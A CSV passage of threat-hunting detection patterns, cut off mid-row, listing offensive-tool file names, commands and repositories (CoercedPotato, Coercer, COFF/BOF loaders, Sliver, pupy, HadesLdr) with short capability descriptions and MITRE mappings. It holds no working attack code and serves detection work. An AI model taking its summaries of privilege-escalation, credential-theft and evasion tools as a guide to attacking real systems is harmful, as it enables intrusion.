"*codewhitesec/apollon*",".{0,1000}codewhitesec\/apollon.{0,1000}","offensive_tool_keyword","apollon","evade auditd by writing /proc/PID/mem","T1054.001 - T1055.001 - T1012","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/codewhitesec/apollon","1","1","N/A","8","1","17","6","2023-08-21T05:43:36Z","2023-07-31T11:55:43Z" "*codewhitesec/daphne*",".{0,1000}codewhitesec\/daphne.{0,1000}","offensive_tool_keyword","daphne","evade auditd by tampering via ptrace","T1054.004 - T1012 - T1057","TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/codewhitesec/daphne","1","1","N/A","8","1","15","3","2023-08-03T08:31:40Z","2023-07-31T11:57:29Z" "*CoercedPotato spawn *",".{0,1000}CoercedPotato\sspawn\s.{0,1000}","offensive_tool_keyword","CoercedPotatoRDLL","Reflective DLL to privesc from NT Service to SYSTEM using SeImpersonateToken privilege","T1055 - T1134 - T1548","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/sokaRepo/CoercedPotatoRDLL","1","0","N/A","10","2","172","27","2023-11-23T18:58:41Z","2023-11-23T13:22:38Z" "*CoercedPotato.cpp*",".{0,1000}CoercedPotato\.cpp.{0,1000}","offensive_tool_keyword","CoercedPotato","CoercedPotato From Patate (LOCAL/NETWORK SERVICE) to SYSTEM by abusing SeImpersonatePrivilege on Windows 10 Windows 11 and Server 2022.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Prepouce/CoercedPotato","1","1","N/A","10","3","259","63","2023-11-03T20:58:26Z","2023-09-11T19:04:29Z" "*CoercedPotato.exe*",".{0,1000}CoercedPotato\.exe.{0,1000}","offensive_tool_keyword","CoercedPotato","CoercedPotato From Patate (LOCAL/NETWORK SERVICE) to SYSTEM by abusing SeImpersonatePrivilege on Windows 10 Windows 11 and Server 2022.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Prepouce/CoercedPotato","1","1","N/A","10","3","259","63","2023-11-03T20:58:26Z","2023-09-11T19:04:29Z" 
"*CoercedPotato.exe*",".{0,1000}CoercedPotato\.exe.{0,1000}","offensive_tool_keyword","CoercedPotatoRDLL","Reflective DLL to privesc from NT Service to SYSTEM using SeImpersonateToken privilege","T1055 - T1134 - T1548","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/sokaRepo/CoercedPotatoRDLL","1","1","N/A","10","2","172","27","2023-11-23T18:58:41Z","2023-11-23T13:22:38Z" "*CoercedPotato.sln*",".{0,1000}CoercedPotato\.sln.{0,1000}","offensive_tool_keyword","CoercedPotato","CoercedPotato From Patate (LOCAL/NETWORK SERVICE) to SYSTEM by abusing SeImpersonatePrivilege on Windows 10 Windows 11 and Server 2022.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Prepouce/CoercedPotato","1","1","N/A","10","3","259","63","2023-11-03T20:58:26Z","2023-09-11T19:04:29Z" "*CoercedPotato-master*",".{0,1000}CoercedPotato\-master.{0,1000}","offensive_tool_keyword","CoercedPotato","CoercedPotato From Patate (LOCAL/NETWORK SERVICE) to SYSTEM by abusing SeImpersonatePrivilege on Windows 10 Windows 11 and Server 2022.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Prepouce/CoercedPotato","1","1","N/A","10","3","259","63","2023-11-03T20:58:26Z","2023-09-11T19:04:29Z" "*CoercedPotatoRDLL-main*",".{0,1000}CoercedPotatoRDLL\-main.{0,1000}","offensive_tool_keyword","CoercedPotatoRDLL","Reflective DLL to privesc from NT Service to SYSTEM using SeImpersonateToken privilege","T1055 - T1134 - T1548","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/sokaRepo/CoercedPotatoRDLL","1","1","N/A","10","2","172","27","2023-11-23T18:58:41Z","2023-11-23T13:22:38Z" "*CoercePotato coerce*",".{0,1000}CoercePotato\scoerce.{0,1000}","offensive_tool_keyword","CoercedPotatoRDLL","Reflective DLL to privesc from NT Service to SYSTEM using SeImpersonateToken privilege","T1055 - T1134 - T1548","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege 
Escalation","https://github.com/sokaRepo/CoercedPotatoRDLL","1","0","N/A","10","2","172","27","2023-11-23T18:58:41Z","2023-11-23T13:22:38Z" "*Coercer coerce*",".{0,1000}Coercer\scoerce.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","0","N/A","10","10","1564","175","2024-04-17T07:30:29Z","2022-06-30T16:52:33Z" "*coercer -d * -u *",".{0,1000}coercer\s\-d\s.{0,1000}\s\-u\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*Coercer fuzz*",".{0,1000}Coercer\sfuzz.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","0","N/A","10","10","1564","175","2024-04-17T07:30:29Z","2022-06-30T16:52:33Z" "*Coercer scan*",".{0,1000}Coercer\sscan.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","0","N/A","10","10","1564","175","2024-04-17T07:30:29Z","2022-06-30T16:52:33Z" "*coercer.core*",".{0,1000}coercer\.core.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an 
arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","10","10","1564","175","2024-04-17T07:30:29Z","2022-06-30T16:52:33Z" "*coercer.methods*",".{0,1000}coercer\.methods.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","10","10","1564","175","2024-04-17T07:30:29Z","2022-06-30T16:52:33Z" "*coercer.models*",".{0,1000}coercer\.models.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","10","10","1564","175","2024-04-17T07:30:29Z","2022-06-30T16:52:33Z" "*coercer.network*",".{0,1000}coercer\.network.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","10","10","1564","175","2024-04-17T07:30:29Z","2022-06-30T16:52:33Z" "*coercer.network.DCERPCSession*",".{0,1000}coercer\.network\.DCERPCSession.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","0","N/A","10","10","1564","175","2024-04-17T07:30:29Z","2022-06-30T16:52:33Z" 
"*coercer.network.smb*",".{0,1000}coercer\.network\.smb.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","0","N/A","10","10","1564","175","2024-04-17T07:30:29Z","2022-06-30T16:52:33Z" "*Coercer.py *",".{0,1000}Coercer\.py\s.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","0","N/A","10","10","1564","175","2024-04-17T07:30:29Z","2022-06-30T16:52:33Z" "*coercer.structures*",".{0,1000}coercer\.structures.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","10","10","1564","175","2024-04-17T07:30:29Z","2022-06-30T16:52:33Z" "*coercer/core/loader*",".{0,1000}coercer\/core\/loader.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","10","10","1564","175","2024-04-17T07:30:29Z","2022-06-30T16:52:33Z" "*coercer_check*",".{0,1000}coercer_check.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation 
Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*coff_definitions.h*",".{0,1000}coff_definitions\.h.{0,1000}","offensive_tool_keyword","cobaltstrike","Load and execute COFF files and Cobalt Strike BOFs in-memory","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Yaxser/COFFLoader2","1","1","N/A","10","10","181","40","2022-09-13T14:58:30Z","2021-12-14T07:49:17Z" "*COFF_Loader.*",".{0,1000}COFF_Loader\..{0,1000}","offensive_tool_keyword","cobaltstrike","Load and execute COFF files and Cobalt Strike BOFs in-memory","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - 
T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Yaxser/COFFLoader2","1","1","N/A","10","10","181","40","2022-09-13T14:58:30Z","2021-12-14T07:49:17Z" "*COFF_PREP_BEACON*",".{0,1000}COFF_PREP_BEACON.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File Loader","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cracked5pider/CoffeeLdr","1","1","N/A","10","10","267","36","2023-12-03T18:09:34Z","2022-07-18T15:21:11Z" "*CoffeeLdr* go 
*",".{0,1000}CoffeeLdr.{0,1000}\sgo\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File Loader","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cracked5pider/CoffeeLdr","1","0","N/A","10","10","267","36","2023-12-03T18:09:34Z","2022-07-18T15:21:11Z" "*CoffeeLdr.x64.exe*",".{0,1000}CoffeeLdr\.x64\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File Loader","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 
- T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cracked5pider/CoffeeLdr","1","1","N/A","10","10","267","36","2023-12-03T18:09:34Z","2022-07-18T15:21:11Z" "*CoffeeLdr.x86.exe*",".{0,1000}CoffeeLdr\.x86\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File Loader","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cracked5pider/CoffeeLdr","1","1","N/A","10","10","267","36","2023-12-03T18:09:34Z","2022-07-18T15:21:11Z" "*COFFELDR_COFFELDR_H*",".{0,1000}COFFELDR_COFFELDR_H.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File Loader","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 
- T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cracked5pider/CoffeeLdr","1","1","N/A","10","10","267","36","2023-12-03T18:09:34Z","2022-07-18T15:21:11Z" "*coffexec *.o *",".{0,1000}coffexec\s.{0,1000}\.o\s.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*COFFLdr.cpp*",".{0,1000}COFFLdr\.cpp.{0,1000}","offensive_tool_keyword","Jormungandr","Jormungandr is a kernel implementation of a COFF loader allowing kernel developers to load and execute their COFFs in the kernel","T1215 - T1059.003 - T1547.006","TA0004 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Idov31/Jormungandr","1","1","N/A","N/A","3","210","26","2023-09-26T18:06:53Z","2023-06-25T06:24:16Z" 
"*COFFLdr.exe*",".{0,1000}COFFLdr\.exe.{0,1000}","offensive_tool_keyword","Jormungandr","Jormungandr is a kernel implementation of a COFF loader allowing kernel developers to load and execute their COFFs in the kernel","T1215 - T1059.003 - T1547.006","TA0004 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Idov31/Jormungandr","1","1","N/A","N/A","3","210","26","2023-09-26T18:06:53Z","2023-06-25T06:24:16Z" "*COFFLoader.*",".{0,1000}COFFLoader\..{0,1000}","offensive_tool_keyword","cobaltstrike","This is a quick and dirty COFF loader (AKA Beacon Object Files). Currently can run un-modified BOF's so it can be used for testing without a CS agent running it","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/COFFLoader","1","1","N/A","10","10","426","68","2023-05-15T20:42:41Z","2021-02-19T19:14:43Z" "*COFFLoader.x64.dll*",".{0,1000}COFFLoader\.x64\.dll.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 
- T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*COFFLoader.x86.dll*",".{0,1000}COFFLoader\.x86\.dll.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*COFFLoader64.exe*",".{0,1000}COFFLoader64\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","This is a quick and dirty COFF loader (AKA Beacon Object Files). 
Currently can run un-modified BOF's so it can be used for testing without a CS agent running it","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/COFFLoader","1","1","N/A","10","10","426","68","2023-05-15T20:42:41Z","2021-02-19T19:14:43Z" "*CognisysGroup/HadesLdr*",".{0,1000}CognisysGroup\/HadesLdr.{0,1000}","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/CognisysGroup/HadesLdr","1","1","N/A","10","3","275","41","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z" "*coinomi2john.py*",".{0,1000}coinomi2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" 
"*coldfusion_dir_traversal_exploit*",".{0,1000}coldfusion_dir_traversal_exploit.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*Collect security tokens from pipe server (\\\\.\\pipe\\catcher)*",".{0,1000}Collect\ssecurity\stokens\sfrom\spipe\sserver\s\(\\\\\\\\\.\\\\pipe\\\\catcher\).{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*Collection/MiniDumpWriteDump.*",".{0,1000}Collection\/MiniDumpWriteDump\..{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","285","59","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*Collection_ArchiveCollectedData_ArchiveViaCustomMethod.py*",".{0,1000}Collection_ArchiveCollectedData_ArchiveViaCustomMethod\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a 
graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Collection_ArchiveCollectedData_ArchiveViaCustomMethod_7z.py*",".{0,1000}Collection_ArchiveCollectedData_ArchiveViaCustomMethod_7z\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - 